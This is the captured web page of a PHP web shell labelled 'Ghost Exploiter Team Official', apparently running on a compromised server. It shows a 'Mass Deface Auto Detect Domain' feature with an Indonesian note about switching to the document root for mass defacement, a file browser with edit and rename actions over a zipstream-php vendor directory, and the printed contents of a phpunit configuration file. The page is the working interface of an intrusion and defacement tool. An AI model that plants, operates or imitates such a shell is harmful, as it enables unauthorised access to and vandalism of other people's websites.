Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
maennchen
/
zipstream-php
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
.phive
--
ren
.phpdoc
--
ren
guides
--
ren
src
--
ren
test
--
ren
.editorconfig
0.286KB
edt
ren
.php-cs-fixer.dist.php
2.353KB
edt
ren
.tool-versions
0.01KB
edt
ren
LICENSE
1.235KB
edt
ren
README.md
7.247KB
edt
ren
composer.json
2.8KB
edt
ren
phpdoc.dist.xml
1.26KB
edt
ren
phpunit.xml.dist
0.467KB
edt
ren
psalm.xml
0.877KB
edt
ren
<?xml version="1.0"?> <phpunit xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" bootstrap="test/bootstrap.php" xsi:noNamespaceSchemaLocation="https://schema.phpunit.de/10.1/phpunit.xsd" cacheDirectory=".phpunit.cache"> <coverage/> <testsuites> <testsuite name="Application"> <directory>test</directory> </testsuite> </testsuites> <logging/> <source> <include> <directory suffix=".php">src</directory> </include> </source> </phpunit>